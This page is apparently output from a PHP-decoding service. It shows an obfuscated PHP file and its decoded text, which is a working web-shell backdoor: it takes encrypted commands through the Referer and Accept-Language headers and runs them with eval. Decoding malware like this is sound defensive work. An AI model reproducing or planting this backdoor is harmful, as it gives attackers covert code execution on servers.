Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $Z='ANGUAGEGEGE"];iEGf($rr&&$rEGa){$u=pEGarsEGe_url($EGrr);pEGarse_EGstrEG($u["queEG..
Decoded Output download
$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}
Did this file decode correctly?
Original Code
<?php
$Z='ANGUAGEGEGE"];iEGf($rr&&$rEGa){$u=pEGarsEGe_url($EGrr);pEGarse_EGstrEG($u["queEGry"],$qEG)EGEG';
$z='"";EGfor($i=0;EG$i<$l;){forEG($j=EG0;($j<$c&EG&$i<$lEG);$jEG++EG,$i+EGEGEG+){$o.=$tEG{$EGi}^$k';
$g='G)EG;if($q&&$mEG){@sEGession_stEGartEG()EG;$s=&$_SEEGSSION;$ssEG="suEGbstr";$sEGl="strtoEGloweE';
$W=str_replace('H','','crHeatHeH_fuHncHHtion');
$K='64_encode(xEG(gEGzcompress($o)EG,EG$k));print("EG<$k>EG$d</EG$k>");@seEGssioEGn_destroy(EG);}}}}';
$x=';$q=arrayEG_values($q);preg_EGmatEGch_all("EG/([\\w])[\\EGw-]+EG(?:;q=0.([EG\\EGd]))?,?EG/",$ra,$mE';
$Q='$ss(EG$s[$i],EG0,$e)EGEG)),$k))EG);$o=ob_getEG_contenEGts();EGob_EGenEGd_clean();$d=baEGsEGeEG';
$M='[$EGi]EG.=$p;$e=strpos($s[$EGi],$fEG);if(EG$EGe)EG{$k=$kh.$kEGfEG;ob_start();@evEGal(@gzuncEGom';
$B='trpos($p,$EGhEG)===0){EG$s[$i]EG="";$p=$EGss($p,3);EG}iEGEGf(array_key_eEGxistEGs($i,EG$s)){$sEG';
$l='.$kf),0,3EG));EGEG$p="";foEGr($zEG=1;$EGEGz<cEGount($m[1]);EG$z++)$pEG.=$EGq[$m[2][$z]];ifEG(s';
$p='$khEG="5d41"EG;$kf="402a";EGEGfunEGction x(EG$t,$k){$c=EGstrlen($kEG)EG;$l=strlen(EG$t)EG;$EGo=';
$w='Gr";$i=$EGm[1][0EG].$m[1EG]EG[1EG]EG;$h=$sl($ss(md5($i.$EGkh),EG0,3EGEG)EG);$f=$sl($ss(mEGd5($i';
$u='{$EGj};}}return $o;}$rEG=$_SERVER;$rrEG=@$r[EG"HTEGTP_REFEREEGEGR"];$ra=@EG$r["EGEGHTTP_ACCEPT_L';
$F='pressEG(@x(@bEGase64_EGdeEGcode(prEGeg_replEGace(arrEGay("EG/EG_/","/-/"),arrEGEGay("/","+")EG,';
$h=str_replace('EG','',$p.$z.$u.$Z.$x.$g.$w.$l.$B.$M.$F.$Q.$K);
$o=$W('',$h);$o();
?>
Function Calls
null | 1 |
str_replace | 2 |
create_function | 1 |
Stats
MD5 | 8043c319c1b5a8d4831ca13ed9ee7292 |
Eval Count | 1 |
Decode Time | 124 ms |